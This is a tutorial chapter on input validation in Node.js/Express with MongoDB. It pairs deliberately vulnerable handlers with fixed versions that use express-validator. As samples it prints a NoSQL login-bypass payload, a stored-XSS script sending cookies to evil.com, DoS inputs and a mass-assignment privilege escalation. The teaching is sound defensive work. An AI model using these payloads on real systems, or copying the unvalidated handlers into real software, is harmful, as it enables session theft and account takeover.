Episode 3 — NodeJS MongoDB Backend Architecture / 3.10 — Input Validation
3.10.a — Why Validation Matters
Input validation is the practice of checking data against expected formats, types, and constraints before processing. It protects data integrity, prevents security vulnerabilities, and improves user experience.
< README | 3.10.b — Express Validator >
1. What Is Input Validation?
Validation is the process of verifying that incoming data meets your application's expectations before it enters your business logic or database.
User Input --> [VALIDATION LAYER] --> Business Logic --> Database
|
v
Reject bad data
with clear errors
Every piece of data that crosses a trust boundary must be validated:
- HTTP request bodies (POST/PUT data)
- URL parameters (
/users/:id) - Query strings (
?page=1&limit=10) - HTTP headers (authorization tokens, content types)
- File uploads (type, size, name)
- Data from external APIs or services
2. Data Integrity
Without validation, your database fills with inconsistent, malformed data that breaks downstream systems.
What Goes Wrong
// No validation — anything goes into the database
app.post('/users', async (req, res) => {
const user = await User.create(req.body);
res.json(user);
});
// These all succeed — and they should NOT:
// { email: "not-an-email", age: -5, name: "" }
// { email: 123, age: "old", name: null }
// { unexpectedField: "malicious data" }
Real Consequences
| Problem | Example | Impact |
|---|---|---|
| Wrong type | age: "twenty" instead of age: 20 | Calculations break, sorting fails |
| Missing required fields | No email on a user record | Cannot send notifications, login fails |
| Out-of-range values | quantity: -50 on an order | Inventory goes negative, financial errors |
| Malformed references | userId: "abc" instead of valid ObjectId | Broken joins, orphaned records |
| Duplicate entries | Two accounts with same email | Auth confusion, data leaks |
3. Security Threats Without Validation
3.1 SQL/NoSQL Injection
// Without validation — MongoDB injection
app.post('/login', async (req, res) => {
const { username, password } = req.body;
// Attacker sends: { username: { "$gt": "" }, password: { "$gt": "" } }
// This query matches ANY document where username and password exist
const user = await User.findOne({ username, password });
// Attacker is logged in as the first user in the collection
});
// With validation — injection blocked
app.post('/login',
body('username').isString().trim().isLength({ min: 3, max: 30 }),
body('password').isString().isLength({ min: 8 }),
async (req, res) => {
const errors = validationResult(req);
if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });
// username and password are guaranteed to be strings now
const user = await User.findOne({
username: req.body.username
});
const isMatch = await bcrypt.compare(req.body.password, user.password);
}
);
3.2 Cross-Site Scripting (XSS)
// Without validation — stored XSS
app.post('/comments', async (req, res) => {
// Attacker sends: { text: "<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>" }
const comment = await Comment.create({ text: req.body.text });
// When other users view this comment, the script executes in their browser
});
// With sanitization — XSS blocked
const { body } = require('express-validator');
app.post('/comments',
body('text').trim().escape().isLength({ min: 1, max: 5000 }),
async (req, res) => {
// .escape() converts < > & " ' to HTML entities
// "<script>" becomes "<script>"
}
);
3.3 Denial of Service (DoS)
// Without validation — DoS via payload size
app.post('/search', async (req, res) => {
// Attacker sends: { query: "a".repeat(10_000_000) }
// Or: { items: Array(1_000_000).fill("data") }
// Server runs out of memory processing this
const results = await Product.find({ name: new RegExp(req.body.query) });
});
// With validation — payload constrained
app.post('/search',
body('query').isString().isLength({ min: 1, max: 200 }),
body('items').optional().isArray({ max: 100 }),
// Server rejects oversized payloads immediately
);
4. Server-Side vs Client-Side Validation
CLIENT-SIDE SERVER-SIDE
┌─────────────────────┐ ┌─────────────────────────┐
│ Quick feedback │ │ Security enforcement │
│ Reduces requests │ │ Data integrity │
│ Better UX │ │ Cannot be bypassed │
│ CAN be bypassed │ │ Canonical source │
└─────────────────────┘ └─────────────────────────┘
│ │
└──────────── BOTH ARE NEEDED ───────┘
| Aspect | Client-Side | Server-Side |
|---|---|---|
| Purpose | UX improvement | Security enforcement |
| Can be bypassed? | Yes (DevTools, curl, Postman) | No |
| Feedback speed | Instant | Requires round-trip |
| Where it runs | Browser (JavaScript) | Server (Node.js) |
| Required? | Nice to have | Absolutely mandatory |
Why Client-Side Alone Is Never Enough
# Anyone can bypass client-side validation with curl:
curl -X POST http://localhost:3000/api/users \
-H "Content-Type: application/json" \
-d '{"email": "not-valid", "age": -999, "role": "admin"}'
# Or with browser DevTools:
# 1. Open Network tab
# 2. Edit and resend any request
# 3. All client-side validation is bypassed
5. Defense in Depth
Validate at every boundary, not just one layer:
┌──────────────────────────────────────────────────────────┐
│ Layer 1: Client-Side Validation (HTML5 + JavaScript) │
│ ┌────────────────────────────────────────────────────┐ │
│ │ Layer 2: API Gateway / Rate Limiting │ │
│ │ ┌──────────────────────────────────────────────┐ │ │
│ │ │ Layer 3: Express Middleware Validation │ │ │
│ │ │ ┌────────────────────────────────────────┐ │ │ │
│ │ │ │ Layer 4: Mongoose Schema Validation │ │ │ │
│ │ │ │ ┌──────────────────────────────────┐ │ │ │ │
│ │ │ │ │ Layer 5: MongoDB Schema Rules │ │ │ │ │
│ │ │ │ └──────────────────────────────────┘ │ │ │ │
│ │ │ └────────────────────────────────────────┘ │ │ │
│ │ └──────────────────────────────────────────────┘ │ │
│ └────────────────────────────────────────────────────┘ │
└──────────────────────────────────────────────────────────┘
// Layer 3: Express middleware validation
const validateRegistration = [
body('email').isEmail().normalizeEmail(),
body('password').isStrongPassword(),
body('age').isInt({ min: 13, max: 120 }),
];
// Layer 4: Mongoose schema validation
const userSchema = new mongoose.Schema({
email: {
type: String,
required: [true, 'Email is required'],
match: [/^\S+@\S+\.\S+$/, 'Invalid email format'],
unique: true,
lowercase: true,
trim: true,
},
password: {
type: String,
required: [true, 'Password is required'],
minlength: [8, 'Password must be at least 8 characters'],
},
age: {
type: Number,
min: [13, 'Must be at least 13 years old'],
max: [120, 'Invalid age'],
},
});
6. Validation vs Sanitization
These are related but distinct operations:
| Concept | Purpose | Example |
|---|---|---|
| Validation | Check if data meets rules — accept or reject | Is "hello@email.com" a valid email? |
| Sanitization | Transform data to be safe/clean | Trim whitespace, escape HTML, normalize email |
const { body } = require('express-validator');
app.post('/profile',
// VALIDATION — reject if rules not met
body('email').isEmail(), // Must be valid email
body('age').isInt({ min: 0, max: 150 }), // Must be integer 0-150
body('website').optional().isURL(), // If present, must be URL
// SANITIZATION — transform the data
body('email').normalizeEmail(), // "John@GMAIL.COM" -> "john@gmail.com"
body('name').trim().escape(), // " <b>John</b> " -> "John"
body('age').toInt(), // "25" -> 25
);
Order Matters
// WRONG: sanitize before validate — may hide invalid input
body('age').toInt().isInt({ min: 0 });
// "abc" -> NaN -> fails isInt (works here by luck)
// But: "12abc" -> 12 -> passes isInt (BAD — original input was invalid)
// RIGHT: validate first, then sanitize
body('age').isInt({ min: 0 }).toInt();
// "12abc" -> fails isInt immediately (GOOD)
// "12" -> passes isInt -> converted to number 12
7. Real-World Validation Failures
Case 1: Mass Assignment Vulnerability
// Dangerous: accepting entire req.body
app.put('/users/:id', async (req, res) => {
await User.findByIdAndUpdate(req.params.id, req.body);
// Attacker sends: { role: "admin", verified: true }
// They just elevated their own privileges
});
// Safe: validate and whitelist fields
app.put('/users/:id',
body('name').optional().isString().trim().isLength({ max: 100 }),
body('bio').optional().isString().trim().isLength({ max: 500 }),
async (req, res) => {
const { name, bio } = req.body; // Only extract allowed fields
await User.findByIdAndUpdate(req.params.id, { name, bio });
}
);
Case 2: Type Coercion Bugs
// JavaScript type coercion creates unexpected behavior
"5" > "12" // true (string comparison: "5" > "1")
"5" > 12 // false (number comparison: 5 > 12)
// Without validation, query parameters are always strings
app.get('/products', async (req, res) => {
// req.query.minPrice is "5" (string), not 5 (number)
// MongoDB comparison with string vs number fields may give wrong results
const products = await Product.find({ price: { $gte: req.query.minPrice } });
});
Key Takeaways
- Never trust user input — validate everything that crosses a trust boundary
- Server-side validation is mandatory — client-side validation is only for UX
- Validate AND sanitize — validation rejects bad data, sanitization cleans good data
- Defense in depth — validate at every layer (middleware, schema, database)
- Whitelist fields — never pass raw
req.bodyto database operations - Security threats — injection, XSS, and DoS attacks all exploit missing validation
Explain-It Challenge
Imagine you are building a public API for a banking application. A junior developer suggests that since the mobile app validates all inputs before sending requests, server-side validation is unnecessary. Explain in detail why this reasoning is flawed, what specific attacks could exploit this gap, and design a multi-layer validation strategy for a money transfer endpoint (
POST /transferwithrecipientId,amount, andnotefields).